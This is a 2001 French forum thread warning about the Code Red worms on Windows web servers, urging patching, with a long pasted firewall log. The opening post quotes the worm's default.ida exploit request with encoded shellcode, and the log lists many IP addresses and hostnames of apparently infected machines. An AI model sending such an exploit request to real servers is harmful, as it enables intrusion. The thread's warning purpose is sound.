! ALERTE AU VER : RED CODE ! et red code 2, le retour

! ALERTE AU VER : RED CODE ! et red code 2, le retour - Windows & Software

Marsh Posté le 05-08-2001 à 22:28:57    

Ceux qui utilisent un firewall l'ont surement remarqué: depuis quelques jour, de nombreuses machines cherchent à contacter les machines voisines sur le port 80 avec une requete http de type
GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
 
 
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
 
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
 
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
 
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%
 
ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
 
bd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u5
 
3ff%u0078%u0000%u00=a.
 
En fait, il sagit du ver red code, qui se propage sur les serveurs NT/2000.
Son objectif final, est une attaque de type Dos contre le site www.whitehouse.gov
De nombreuses machines sont contaminées.
 
Pour plus d'infos :  
http://www.securityfocus.com/frame [...] ads%3D1%26
 
 
patch Microsoft :
http://www.microsoft.com/technet/t [...] /security/
 
 
Si vous pensez être contaminé, agissez vite ; nettoyez votre machine, car celle-ci peut contaminer plusieurs centaines d'autres par jour.

 

[edtdd]--Message édité par chr_79--[/edtdd]

Reply

Marsh Posté le 05-08-2001 à 22:28:57   

Reply

Marsh Posté le 05-08-2001 à 22:34:28    

Please, que ceux qui ont installé un serveur Web Microsoft passent le patch.
J'en ai marre de me faire attaquer par les abonnés de Wanadoo, qui ne savent pas installer et configurer correctement un serveur Web!!!!

Reply

Marsh Posté le 05-08-2001 à 23:39:26    

euh y a un moyen de savoir si on est inffecter car normalement j ai mon routeur linux qui fait firewall masi bon ...

Reply

Marsh Posté le 05-08-2001 à 23:42:31    

Ben oui avec un antivirus MIS A JOURS

Reply

Marsh Posté le 05-08-2001 à 23:43:00    

Si tu as un serveur Web Microsoft quelque part, ne te pose pas de question si tu es infecté ou pas , mais passe le patch. Ca te protegera au cas où.  
"Il vaut mieux prevenir que guerir"

Reply

Marsh Posté le 05-08-2001 à 23:43:23    

si tu ne fait pas de forward du port 80 de l'exterieur vers l'interieur de ton réseau, tu ne dois pas être contaminé.
 
Pour plus de sécurité, je te conseille quand même d'appliquer le patch de microsoft.

Reply

Marsh Posté le 05-08-2001 à 23:43:53    

voila mes logs depuis que red core a commencé :p
 
kes ke je peux faire ?
 
996716235 - 08/02/2001 03:37:15 Host: 212.109.3.218/212.109.3.218 Port: 80 TCP Blocked
996718971 - 08/02/2001 04:22:51 Host: cr125296-a.mtmk1.on.wave.home.com/24.101.228.233 Port: 80 TCP Blocked
996719645 - 08/02/2001 04:34:05 Host: servidor.telematicsa.com/200.55.4.15 Port: 80 TCP Blocked
996719896 - 08/02/2001 04:38:16 Host: 203.116.77.218/203.116.77.218 Port: 80 TCP Blocked
996720636 - 08/02/2001 04:50:36 Host: 211.240.34.187/211.240.34.187 Port: 80 TCP Blocked
996720717 - 08/02/2001 04:51:57 Host: p521.asi.euronet.nl/194.134.124.85 Port: 80 TCP Blocked
996720798 - 08/02/2001 04:53:18 Host: 210.96.171.111/210.96.171.111 Port: 80 TCP Blocked
996721441 - 08/02/2001 05:04:01 Host: bmgv5437y260j.bc.hsia.telus.net/216.232.234.59 Port: 80 TCP Blocked
996722888 - 08/02/2001 05:28:08 Host: 168.221.177.99/168.221.177.99 Port: 80 TCP Blocked
996726461 - 08/02/2001 06:27:41 Host: 61.74.62.136/61.74.62.136 Port: 80 TCP Blocked
996729069 - 08/02/2001 07:11:09 Host: 211.63.28.21/211.63.28.21 Port: 80 TCP Blocked
996731430 - 08/02/2001 07:50:30 Host: 217.141.19.30/217.141.19.30 Port: 80 TCP Blocked
996731449 - 08/02/2001 07:50:49 Host: 24-109-20-69.ivideon.com/24.109.20.69 Port: 80 TCP Blocked
996732574 - 08/02/2001 08:09:34 Host: pD9E4DCB8.dip.t-dialin.net/217.228.220.184 Port: 80 TCP Blocked
996734126 - 08/02/2001 08:35:26 Host: du228022.sun.ptd.net/204.186.228.22 Port: 80 TCP Blocked
996743770 - 08/02/2001 11:16:10 Host: 181-214-179-208.pajo.com/208.179.214.181 Port: 80 TCP Blocked
996744096 - 08/02/2001 11:21:36 Host: 203.248.53.133/203.248.53.133 Port: 80 TCP Blocked
996744618 - 08/02/2001 11:30:18 Host: 61.75.27.126/61.75.27.126 Port: 80 TCP Blocked
996744653 - 08/02/2001 11:30:53 Host: 211.62.58.33/211.62.58.33 Port: 53 TCP Blocked
996744894 - 08/02/2001 11:34:54 Host: 211.48.10.140/211.48.10.140 Port: 80 TCP Blocked
996747135 - 08/02/2001 12:12:15 Host: gem-adsl-soho-p132.vtx.ch/212.147.18.132 Port: 80 TCP Blocked
996752017 - 08/02/2001 13:33:37 Host: 217.58.18.204/217.58.18.204 Port: 80 TCP Blocked
996754462 - 08/02/2001 14:14:22 Host: manualarts1.mahs.org/206.117.243.5 Port: 80 TCP Blocked
996755366 - 08/02/2001 14:29:26 Host: c1436003-b.sttln1.wa.home.com/24.16.226.66 Port: 80 TCP Blocked
996755515 - 08/02/2001 14:31:55 Host: 203.66.220.9/203.66.220.9 Port: 80 TCP Blocked
996765718 - 08/02/2001 17:21:58 Host: ADijon-102-1-1-101.abo.wanadoo.fr/193.253.242.101 Port: 53 TCP Blocked
996768945 - 08/02/2001 18:15:45 Host: p3E9E89C4.dip0.t-ipconnect.de/62.158.137.196 Port: 80 TCP Blocked
996770514 - 08/02/2001 18:41:54 Host: 211.212.97.59/211.212.97.59 Port: 80 TCP Blocked
996770983 - 08/02/2001 18:49:43 Host: 211.72.9.30/211.72.9.30 Port: 80 TCP Blocked
996774285 - 08/02/2001 19:44:45 Host: awork065161.netvigator.com/203.198.29.161 Port: 80 TCP Blocked
996777146 - 08/02/2001 20:32:26 Host: du-148-221-183-184.prodigy.net.mx/148.221.183.184 Port: 80 TCP Blocked
996777443 - 08/02/2001 20:37:23 Host: 195.152.147.77/195.152.147.77 Port: 80 TCP Blocked
996778242 - 08/02/2001 20:50:42 Host: nycmny1-ar1-095-207.nycmny1.dsl.gtei.net/4.3.95.207 Port: 80 TCP Blocked
996782871 - 08/02/2001 22:07:51 Host: vbch1UBR3-6-hfc-0251-40e896f6.rdc1.va.coxatwork.com/64.232.150.246 Port: 80 TCP Blocked
996792283 - 08/03/2001 00:44:43 Host: c999204-a.iowact1.ia.home.com/24.178.150.55 Port: 80 TCP Blocked
996796874 - 08/03/2001 02:01:14 Host: 202.104.254.2/202.104.254.2 Port: 80 TCP Blocked
996803252 - 08/03/2001 03:47:32 Host: 206.246.116.35/206.246.116.35 Port: 80 TCP Blocked
996805123 - 08/03/2001 04:18:43 Host: szptt105.157.szptt.net.cn/202.105.157.21 Port: 80 TCP Blocked
996806272 - 08/03/2001 04:37:52 Host: adsl-64-123-8-144.dsl.austtx.swbell.net/64.123.8.144 Port: 80 TCP Blocked
996808602 - 08/03/2001 05:16:42 Host: adsl-191-163.globetrotter.net/142.169.191.163 Port: 80 TCP Blocked
996808939 - 08/03/2001 05:22:19 Host: 12.27.8.161/12.27.8.161 Port: 80 TCP Blocked
996809035 - 08/03/2001 05:23:55 Host: 61.74.137.66/61.74.137.66 Port: 80 TCP Blocked
996811025 - 08/03/2001 05:57:05 Host: 210.183.175.229/210.183.175.229 Port: 80 TCP Blocked
996814452 - 08/03/2001 06:54:12 Host: ppp-3055-M12-96.dialup.eol.ca/64.56.226.96 Port: 80 TCP Blocked
996814783 - 08/03/2001 06:59:43 Host: 210.110.71.176/210.110.71.176 Port: 80 TCP Blocked
996815795 - 08/03/2001 07:16:35 Host: 65.167.232.81/65.167.232.81 Port: 80 TCP Blocked
996816996 - 08/03/2001 07:36:36 Host: 61.139.80.248/61.139.80.248 Port: 80 TCP Blocked
996820116 - 08/03/2001 08:28:36 Host: c1476875-a.frmt1.sfba.home.com/65.11.125.74 Port: 80 TCP Blocked
996820387 - 08/03/2001 08:33:07 Host: 206.48.17.109/206.48.17.109 Port: 80 TCP Blocked
996826827 - 08/03/2001 10:20:27 Host: w0029884.who.int/158.232.23.44 Port: 407 UDP Blocked
996829687 - 08/03/2001 11:08:07 Host: 211.155.30.130/211.155.30.130 Port: 80 TCP Blocked
996835539 - 08/03/2001 12:45:39 Host: 211.104.161.152/211.104.161.152 Port: 80 TCP Blocked
996837160 - 08/03/2001 13:12:40 Host: ARennes-301-1-1-238.abo.wanadoo.fr/193.251.66.238 Port: 80 TCP Blocked
996837725 - 08/03/2001 13:22:05 Host: 210.115.56.80/210.115.56.80 Port: 80 TCP Blocked
996839449 - 08/03/2001 13:50:49 Host: 211.36.52.155/211.36.52.155 Port: 80 TCP Blocked
996842169 - 08/03/2001 14:36:09 Host: 155.230.176.133/155.230.176.133 Port: 80 TCP Blocked
996846569 - 08/03/2001 15:49:29 Host: 211.177.57.248/211.177.57.248 Port: 80 TCP Blocked
996847452 - 08/03/2001 16:04:12 Host: 211.112.159.23/211.112.159.23 Port: 80 TCP Blocked
996852158 - 08/03/2001 17:22:38 Host: c99.h061013188.is.net.tw/61.13.188.99 Port: 80 TCP Blocked
996858795 - 08/03/2001 19:13:15 Host: 24.101.127.66.on.wave.home.com/24.101.127.66 Port: 80 TCP Blocked
996858797 - 08/03/2001 19:13:17 Host: 24.101.127.66.on.wave.home.com/24.101.127.66 Port: 80 TCP Blocked
996858798 - 08/03/2001 19:13:18 Host: 24.101.127.66.on.wave.home.com/24.101.127.66 Port: 80 TCP Blocked
996860129 - 08/03/2001 19:35:29 Host: dclient62-2-137-16.hispeed.ch/62.2.137.16 Port: 80 TCP Blocked
996861553 - 08/03/2001 19:59:13 Host: 210.102.52.60/210.102.52.60 Port: 80 TCP Blocked
996862224 - 08/03/2001 20:10:24 Host: 203.231.236.222/203.231.236.222 Port: 80 TCP Blocked
996867946 - 08/03/2001 21:45:46 Host: 194.184.28.37/194.184.28.37 Port: 80 TCP Blocked
996871791 - 08/03/2001 22:49:51 Host: snovak-0.dsl.speakeasy.net/216.254.36.102 Port: 80 TCP Blocked
996874239 - 08/03/2001 23:30:39 Host: 38.195.196.242/38.195.196.242 Port: 80 TCP Blocked
996881225 - 08/04/2001 01:27:05 Host: apc-ep78207.adsl.hansenet.de/213.191.78.207 Port: 80 TCP Blocked
996882095 - 08/04/2001 01:41:35 Host: 61.143.52.177/61.143.52.177 Port: 80 TCP Blocked
996883472 - 08/04/2001 02:04:32 Host: 211.183.8.253/211.183.8.253 Port: 80 TCP Blocked
996885731 - 08/04/2001 02:42:11 Host: 170-114.leased.cust.tie.cl/200.54.170.114 Port: 80 TCP Blocked
996891639 - 08/04/2001 04:20:39 Host: 213.68.110.230/213.68.110.230 Port: 80 TCP Blocked
996892239 - 08/04/2001 04:30:39 Host: 211-232-107-154.panworldnet.com/211.232.107.154 Port: 80 TCP Blocked
996901946 - 08/04/2001 07:12:26 Host: 210.107.25.212/210.107.25.212 Port: 80 TCP Blocked
996906099 - 08/04/2001 08:21:39 Host: 202.101.121.239/202.101.121.239 Port: 80 TCP Blocked
996906283 - 08/04/2001 08:24:43 Host: 61.142.46.71/61.142.46.71 Port: 80 TCP Blocked
996906791 - 08/04/2001 08:33:11 Host: a0hi3041y2144.bc.hsia.telus.net/64.180.119.156 Port: 80 TCP Blocked
996910603 - 08/04/2001 09:36:43 Host: fridaycorp.com/209.61.156.107 Port: 80 TCP Blocked
996911559 - 08/04/2001 09:52:39 Host: 61.150.240.47/61.150.240.47 Port: 80 TCP Blocked
996913844 - 08/04/2001 10:30:44 Host: c1299484-a.hiland1.co.home.com/65.7.135.65 Port: 80 TCP Blocked
996917240 - 08/04/2001 11:27:20 Host: 203-216-49-239.dsl.gol.ne.jp/203.216.49.239 Port: 80 TCP Blocked
996917479 - 08/04/2001 11:31:19 Host: 210.217.33.26/210.217.33.26 Port: 80 TCP Blocked
996919618 - 08/04/2001 12:06:58 Host: 208.179.72.247/208.179.72.247 Port: 80 TCP Blocked
996925544 - 08/04/2001 13:45:44 Host: 210.108.205.196/210.108.205.196 Port: 80 TCP Blocked
996926332 - 08/04/2001 13:58:52 Host: 211.112.165.247/211.112.165.247 Port: 80 TCP Blocked
996930557 - 08/04/2001 15:09:17 Host: 211.180.57.194/211.180.57.194 Port: 80 TCP Blocked
996932813 - 08/04/2001 15:46:53 Host: 210.105.121.115/210.105.121.115 Port: 80 TCP Blocked
996933008 - 08/04/2001 15:50:08 Host: 202.206.240.26/202.206.240.26 Port: 80 TCP Blocked
996933102 - 08/04/2001 15:51:42 Host: 64.213.59.228/64.213.59.228 Port: 80 TCP Blocked
996933504 - 08/04/2001 15:58:24 Host: 211.156.101.236/211.156.101.236 Port: 80 TCP Blocked
996934053 - 08/04/2001 16:07:33 Host: www.aposys.com/195.26.196.111 Port: 80 TCP Blocked
996935473 - 08/04/2001 16:31:13 Host: dt085nb6.san.rr.com/24.94.3.182 Port: 80 TCP Blocked
996935751 - 08/04/2001 16:35:51 Host: AToulouse-201-1-2-40.abo.wanadoo.fr/193.253.187.40 Port: 80 TCP Blocked
996935874 - 08/04/2001 16:37:54 Host: APastourelles-101-1-3-123.abo.wanadoo.fr/193.253.178.123 Port: 80 TCP Blocked
996937073 - 08/04/2001 16:57:53 Host: AAubervilliers-101-1-2-93.abo.wanadoo.fr/193.253.205.93 Port: 80 TCP Blocked
996937454 - 08/04/2001 17:04:14 Host: ALille-203-1-1-85.abo.wanadoo.fr/193.253.37.85 Port: 80 TCP Blocked
996939028 - 08/04/2001 17:30:28 Host: 200191076107-dial-user-UOL.acessonet.com.br/200.191.76.107 Port: 80 TCP Blocked
996940591 - 08/04/2001 17:56:31 Host: APlessis-Bouchard-101-1-2-26.abo.wanadoo.fr/193.253.247.26 Port: 80 TCP Blocked
996941475 - 08/04/2001 18:11:15 Host: AMontsouris-101-1-5-172.abo.wanadoo.fr/193.253.239.172 Port: 80 TCP Blocked
996941881 - 08/04/2001 18:18:01 Host: APastourelles-101-1-4-142.abo.wanadoo.fr/193.253.204.142 Port: 80 TCP Blocked
996943697 - 08/04/2001 18:48:17 Host: 193.194.79.53/193.194.79.53 Port: 80 TCP Blocked
996943721 - 08/04/2001 18:48:41 Host: ANice-102-1-2-200.abo.wanadoo.fr/193.253.219.200 Port: 80 TCP Blocked
996943809 - 08/04/2001 18:50:09 Host: adsl-81-180-103.bhm.bellsouth.net/65.81.180.103 Port: 80 TCP Blocked
996944400 - 08/04/2001 19:00:00 Host: AMarseille-201-1-2-115.abo.wanadoo.fr/193.253.217.115 Port: 80 TCP Blocked
996945309 - 08/04/2001 19:15:09 Host: AMarseille-201-1-2-97.abo.wanadoo.fr/193.253.217.97 Port: 80 TCP Blocked
996947811 - 08/04/2001 19:56:51 Host: AFontenayssB-103-1-2-209.abo.wanadoo.fr/193.253.44.209 Port: 80 TCP Blocked
996949038 - 08/04/2001 20:17:18 Host: APuteaux-102-1-4-145.abo.wanadoo.fr/193.253.233.145 Port: 80 TCP Blocked
996952938 - 08/04/2001 21:22:18 Host: tripy.Zz.vg/194.177.32.239 Port: 80 TCP Blocked
996953408 - 08/04/2001 21:30:08 Host: ABoulogne-102-1-2-252.abo.wanadoo.fr/193.251.35.252 Port: 80 TCP Blocked
996954680 - 08/04/2001 21:51:20 Host: APuteaux-102-1-5-178.abo.wanadoo.fr/193.253.243.178 Port: 80 TCP Blocked
996955424 - 08/04/2001 22:03:44 Host: APerpignan-101-1-1-234.abo.wanadoo.fr/193.253.223.234 Port: 80 TCP Blocked
996955528 - 08/04/2001 22:05:28 Host: ABoulogne-103-1-1-177.abo.wanadoo.fr/193.253.203.177 Port: 80 TCP Blocked
996955699 - 08/04/2001 22:08:19 Host: ATuileries-106-1-1-191.abo.wanadoo.fr/193.253.59.191 Port: 80 TCP Blocked
996955725 - 08/04/2001 22:08:45 Host: 193.255.198.46/193.255.198.46 Port: 80 TCP Blocked
996955793 - 08/04/2001 22:09:53 Host: ALyon-201-1-3-184.abo.wanadoo.fr/193.253.188.184 Port: 80 TCP Blocked
996957276 - 08/04/2001 22:34:36 Host: APuteaux-102-1-3-146.abo.wanadoo.fr/193.253.232.146 Port: 80 TCP Blocked
996957284 - 08/04/2001 22:34:44 Host: APuteaux-102-1-4-196.abo.wanadoo.fr/193.253.233.196 Port: 80 TCP Blocked
996958076 - 08/04/2001 22:47:56 Host: 203.73.122.221/203.73.122.221 Port: 80 TCP Blocked
996958542 - 08/04/2001 22:55:42 Host: 213.11.10.205/213.11.10.205 Port: 80 TCP Blocked
996959321 - 08/04/2001 23:08:41 Host: ALyon-201-1-3-172.abo.wanadoo.fr/193.253.188.172 Port: 80 TCP Blocked
996959616 - 08/04/2001 23:13:36 Host: APuteaux-102-1-3-16.abo.wanadoo.fr/193.253.232.16 Port: 80 TCP Blocked
996960561 - 08/04/2001 23:29:21 Host: AMontsouris-101-1-5-147.abo.wanadoo.fr/193.253.239.147 Port: 80 TCP Blocked
996963126 - 08/05/2001 00:12:06 Host: APoitiers-102-1-1-163.abo.wanadoo.fr/193.253.190.163 Port: 80 TCP Blocked
996963718 - 08/05/2001 00:21:58 Host: cust.64-52-117.099.ip.mia.ebrb.net/64.52.117.99 Port: 80 TCP Blocked
996963818 - 08/05/2001 00:23:38 Host: APastourelles-101-1-3-142.abo.wanadoo.fr/193.253.178.142 Port: 80 TCP Blocked
996966918 - 08/05/2001 01:15:18 Host: APastourelles-101-1-3-87.abo.wanadoo.fr/193.253.178.87 Port: 80 TCP Blocked
996967018 - 08/05/2001 01:16:58 Host: 193.226.188.74/193.226.188.74 Port: 80 TCP Blocked
996967801 - 08/05/2001 01:30:01 Host: APerpignan-101-1-1-237.abo.wanadoo.fr/193.253.223.237 Port: 80 TCP Blocked
996969415 - 08/05/2001 01:56:55 Host: AToulouse-201-1-2-27.abo.wanadoo.fr/193.253.187.27 Port: 80 TCP Blocked
996970072 - 08/05/2001 02:07:52 Host: 195.68.89.10/195.68.89.10 Port: 80 TCP Blocked
996970758 - 08/05/2001 02:19:18 Host: 212.131.255.92/212.131.255.92 Port: 80 TCP Blocked
996972041 - 08/05/2001 02:40:41 Host: AFontenayssB-101-1-4-228.abo.wanadoo.fr/193.253.235.228 Port: 80 TCP Blocked
996982568 - 08/05/2001 05:36:08 Host: 242818hfc155.tampabay.rr.com/24.28.18.155 Port: 80 TCP Blocked
996987433 - 08/05/2001 06:57:13 Host: 134.157.123.152/134.157.123.152 Port: 80 TCP Blocked
996988264 - 08/05/2001 07:11:04 Host: piobert.rma.ac.be/193.190.206.115 Port: 80 TCP Blocked
996990479 - 08/05/2001 07:47:59 Host: mail.bogesunds-vaveri.se/212.209.1.18 Port: 80 TCP Blocked
996994082 - 08/05/2001 08:48:02 Host: ALille-201-1-4-118.abo.wanadoo.fr/193.253.249.118 Port: 80 TCP Blocked
996995953 - 08/05/2001 09:19:13 Host: ANeuilly-101-1-3-156.abo.wanadoo.fr/193.253.209.156 Port: 80 TCP Blocked
996996368 - 08/05/2001 09:26:08 Host: ANeuilly-101-1-3-124.abo.wanadoo.fr/193.253.209.124 Port: 80 TCP Blocked
996996815 - 08/05/2001 09:33:35 Host: 193.128.6.57/193.128.6.57 Port: 80 TCP Blocked
996997595 - 08/05/2001 09:46:35 Host: ANice-102-1-2-215.abo.wanadoo.fr/193.253.219.215 Port: 80 TCP Blocked
996999961 - 08/05/2001 10:26:01 Host: 213.57.159.30/213.57.159.30 Port: 80 TCP Blocked
997000271 - 08/05/2001 10:31:11 Host: AFontenayssB-101-1-6-4.abo.wanadoo.fr/193.253.245.4 Port: 80 TCP Blocked
997000725 - 08/05/2001 10:38:45 Host: Mix-Velizy-109-1-198.abo.wanadoo.fr/193.253.20.198 Port: 80 TCP Blocked
997000741 - 08/05/2001 10:39:01 Host: AMarseille-201-1-2-232.abo.wanadoo.fr/193.253.217.232 Port: 80 TCP Blocked
997002091 - 08/05/2001 11:01:31 Host: ATuileries-103-1-2-184.abo.wanadoo.fr/193.253.32.184 Port: 80 TCP Blocked
997004673 - 08/05/2001 11:44:33 Host: editorial.cda.ulpgc.es/193.145.152.196 Port: 80 TCP Blocked
997005883 - 08/05/2001 12:04:43 Host: APastourelles-101-1-3-25.abo.wanadoo.fr/193.253.178.25 Port: 80 TCP Blocked
997006347 - 08/05/2001 12:12:27 Host: 61.81.112.15/61.81.112.15 Port: 80 TCP Blocked
997006421 - 08/05/2001 12:13:41 Host: ANice-102-1-3-45.abo.wanadoo.fr/193.253.57.45 Port: 80 TCP Blocked
997006652 - 08/05/2001 12:17:32 Host: APuteaux-102-1-3-162.abo.wanadoo.fr/193.253.232.162 Port: 80 TCP Blocked
997007380 - 08/05/2001 12:29:40 Host: ABordeaux-102-1-1-86.abo.wanadoo.fr/193.253.253.86 Port: 80 TCP Blocked
997007603 - 08/05/2001 12:33:23 Host: APlessis-Bouchard-101-1-3-53.abo.wanadoo.fr/193.253.248.53 Port: 80 TCP Blocked
997007923 - 08/05/2001 12:38:43 Host: host-65-199-143-29.link.net/65.199.143.29 Port: 80 TCP Blocked
997009526 - 08/05/2001 13:05:26 Host: Mix-Velizy-109-3-122.abo.wanadoo.fr/193.253.22.122 Port: 80 TCP Blocked
997011265 - 08/05/2001 13:34:25 Host: 211.214.35.220/211.214.35.220 Port: 80 TCP Blocked
997012790 - 08/05/2001 13:59:50 Host: pC19F40D2.dip.t-dialin.net/193.159.64.210 Port: 80 TCP Blocked
997012916 - 08/05/2001 14:01:56 Host: 128.134.14.93/128.134.14.93 Port: 80 TCP Blocked
997013518 - 08/05/2001 14:11:58 Host: APoitiers-103-1-1-102.abo.wanadoo.fr/193.253.254.102 Port: 80 TCP Blocked
997014861 - 08/05/2001 14:34:21 Host: AFontenayssB-101-1-4-10.abo.wanadoo.fr/193.253.235.10 Port: 80 TCP Blocked
997015003 - 08/05/2001 14:36:43 Host: ANantes-101-1-2-56.abo.wanadoo.fr/193.253.229.56 Port: 80 TCP Blocked
997015328 - 08/05/2001 14:42:08 Host: 217.5.165.2/217.5.165.2 Port: 80 TCP Blocked
997015977 - 08/05/2001 14:52:57 Host: ASte-Genev-Bois-102-1-1-115.abo.wanadoo.fr/193.253.61.115 Port: 80 TCP Blocked
997016054 - 08/05/2001 14:54:14 Host: APuteaux-102-1-2-79.abo.wanadoo.fr/193.253.221.79 Port: 80 TCP Blocked
997017257 - 08/05/2001 15:14:17 Host: AAnnecy-101-1-2-174.abo.wanadoo.fr/193.253.252.174 Port: 80 TCP Blocked
997017949 - 08/05/2001 15:25:49 Host: www.homes.oeiprop.com/63.228.247.238 Port: 80 TCP Blocked
997018210 - 08/05/2001 15:30:10 Host: AMontsouris-101-1-4-199.abo.wanadoo.fr/193.253.216.199 Port: 80 TCP Blocked
997018610 - 08/05/2001 15:36:50 Host: APlessis-Bouchard-101-1-2-226.abo.wanadoo.fr/193.253.247.226 Port: 80 TCP Blocked
997020688 - 08/05/2001 16:11:28 Host: APuteaux-102-1-5-234.abo.wanadoo.fr/193.253.243.234 Port: 80 TCP Blocked
997020696 - 08/05/2001 16:11:36 Host: AMarseille-201-1-3-11.abo.wanadoo.fr/193.253.250.11 Port: 80 TCP Blocked
997020742 - 08/05/2001 16:12:22 Host: 193.251.138.3/193.251.138.3 Port: 80 TCP Blocked
997021494 - 08/05/2001 16:24:54 Host: 204.248.246.147/204.248.246.147 Port: 80 TCP Blocked
997021999 - 08/05/2001 16:33:19 Host: ANantes-101-1-2-71.abo.wanadoo.fr/193.253.229.71 Port: 80 TCP Blocked
997022646 - 08/05/2001 16:44:06 Host: APerpignan-101-1-1-198.abo.wanadoo.fr/193.253.223.198 Port: 80 TCP Blocked
997024625 - 08/05/2001 17:17:05 Host: APlessis-Bouchard-101-1-2-141.abo.wanadoo.fr/193.253.247.141 Port: 80 TCP Blocked
997025374 - 08/05/2001 17:29:34 Host: Mix-LeMans-211-3-61.abo.wanadoo.fr/193.253.26.61 Port: 80 TCP Blocked
997025746 - 08/05/2001 17:35:46 Host: 190-93.master-link.com/167.160.190.93 Port: 23 TCP Blocked
997027144 - 08/05/2001 17:59:04 Host: 193.40.166.25/193.40.166.25 Port: 80 TCP Blocked
997027511 - 08/05/2001 18:05:11 Host: 193.92.233.222/193.92.233.222 Port: 80 TCP Blocked
997028913 - 08/05/2001 18:28:33 Host: 193.13.81.202/193.13.81.202 Port: 80 TCP Blocked
997029497 - 08/05/2001 18:38:17 Host: ANice-102-1-3-94.abo.wanadoo.fr/193.253.57.94 Port: 80 TCP Blocked
997029630 - 08/05/2001 18:40:30 Host: AAnnecy-101-1-2-230.abo.wanadoo.fr/193.253.252.230 Port: 80 TCP Blocked
997030112 - 08/05/2001 18:48:32 Host: ALille-203-1-1-226.abo.wanadoo.fr/193.253.37.226 Port: 80 TCP Blocked
997030935 - 08/05/2001 19:02:15 Host: 208.61.233.226/208.61.233.226 Port: 80 TCP Blocked
997032137 - 08/05/2001 19:22:17 Host: 196.40.37.197/196.40.37.197 Port: 80 TCP Blocked
997034030 - 08/05/2001 19:53:50 Host: AFontenayssB-101-1-1-213.abo.wanadoo.fr/193.251.4.213 Port: 80 TCP Blocked
997034232 - 08/05/2001 19:57:12 Host: ASte-Genev-Bois-103-1-2-214.abo.wanadoo.fr/193.253.202.214 Port: 80 TCP Blocked
997036554 - 08/05/2001 20:35:54 Host: www2.openinfo.ch/194.230.83.130 Port: 80 TCP Blocked
997036990 - 08/05/2001 20:43:10 Host: ANice-102-1-5-245.abo.wanadoo.fr/217.128.207.245 Port: 80 TCP Blocked
997038906 - 08/05/2001 21:15:06 Host: APuteaux-102-1-3-228.abo.wanadoo.fr/193.253.232.228 Port: 80 TCP Blocked
997039273 - 08/05/2001 21:21:13 Host: office-14.prominetinc.com/12.39.72.143 Port: 80 TCP Blocked
997039572 - 08/05/2001 21:26:12 Host: 202.126.136.5/202.126.136.5 Port: 80 TCP Blocked
997039652 - 08/05/2001 21:27:32 Host: APlessis-Bouchard-101-1-2-24.abo.wanadoo.fr/193.253.247.24 Port: 80 TCP Blocked
997040029 - 08/05/2001 21:33:49 Host: APastourelles-101-1-3-190.abo.wanadoo.fr/193.253.178.190 Port: 80 TCP Blocked
997041211 - 08/05/2001 21:53:31 Host: 193.137.229.2/193.137.229.2 Port: 80 TCP Blocked
997041803 - 08/05/2001 22:03:23 Host: Mix-Velizy-109-2-148.abo.wanadoo.fr/193.253.21.148 Port: 80 TCP Blocked
997043378 - 08/05/2001 22:29:38 Host: 193.140.173.100/193.140.173.100 Port: 80 TCP Blocked
997044607 - 08/05/2001 22:50:07 Host: Mix-Velizy-109-4-149.abo.wanadoo.fr/193.253.23.149 Port: 80 TCP Blocked
997044630 - 08/05/2001 22:50:30 Host: Mix-Velizy-109-4-168.abo.wanadoo.fr/193.253.23.168 Port: 80 TCP Blocked
997044902 - 08/05/2001 22:55:02 Host: 212.47.189.51/212.47.189.51 Port: 80 TCP Blocked
997045497 - 08/05/2001 23:04:57 Host: ANice-102-1-3-80.abo.wanadoo.fr/193.253.57.80 Port: 80 TCP Blocked

Reply

Marsh Posté le 05-08-2001 à 23:49:43    

Faire comprendre à tout le monde que cette saloperie de ver est toujours sur le net.
 
Sinon, ton ordi à bloqué les port, donc, pas de soucis.

 

[edtdd]--Message édité par chr_79--[/edtdd]

Reply

Marsh Posté le 06-08-2001 à 00:30:48    

mais en fait le truc ki me fé chier c ka chaque "attaque" je recoi un sms sur mon portable :p

Reply

Marsh Posté le 06-08-2001 à 00:32:41    

étrange un sms sur ton protable  :lol:

Reply

Marsh Posté le 06-08-2001 à 00:32:41   

Reply

Marsh Posté le 06-08-2001 à 00:33:55    

bah j'ai mis ca comme option ;)

Reply

Marsh Posté le 06-08-2001 à 02:44:07    

Je travaille sous Win 98.
Des risques de contamination ?

Reply

Marsh Posté le 06-08-2001 à 08:21:42    

Est-ce qu'il suffit de voir les tentatives d'"entrée" sur le port 80 ? (peu importe qu'il y ait un serveur derrière ou non)
 
Car j'ai loggé toutes les connexions sur le port 80 de ma machine, et rien que cette nuit (de 1h à 8h) il y en a eu 32.
Comment reconnaître le ver plutôt qu'une simple tentative d'accès à mon site web(comme je dis, même si je n'en ai pas, mais ils peuvent pas le savoir autrement qu'en essayant)

Reply

Marsh Posté le 06-08-2001 à 09:58:51    

bis repetita :mad:
 
-----------------------------------------------------------------The following is an analysis of CodeRedII (CodeRed Version 2.0) worm.
eEye Digital Security (www.eeye.com)
Security Focus (www.securityfocus.com)
 
We first were contacted about this worm by the  Security Focus ARIS Incident
Analysts.  While they were monitoring various attacks from around the globe
they started to see a new attack pattern, and after a handful of packet
captures they saw there was a new worm on the loose. So they called up eEye
Digital Security to allow us to perform an analysis of this new worm.
 
There is in fact a completely brand new worm loose on the net right now. It
uses the same injection vector as the first CodeRed worm, however this
second worm has a completely different payload than the first worm.
Therefore this second worm is _NOT_ a variant of the first CodeRed worm.
This is an entirly new worm.
 
This analysis is broken up into 3 sections: 1. Infection 2. Propagation 3.
Trojan
 
You can "follow along" in this analysis by loading the worm binary in IDA
and then following the seg locations.
 
This worm, like the original Code Red worm, will only exploit Windows 2000
web servers because it overwrites EIP with a jmp that is only correct under
Windows 2000. Under NT4.0 etc... that offset is different so, the process
will simply crash instead of allowing the worm to infect the system and
spread.
 
Analysis by Ryan Permeh (ryan@eeye.com) and Marc Maiffret (marc@eeye.com) of
eEye Digital Security (www.eeye.com). Ryan has once again generously taken
the time to comment all of the assembly code for better understanding of the
worm.
 
The fix that has been talked about for Code Red is still the same fix for
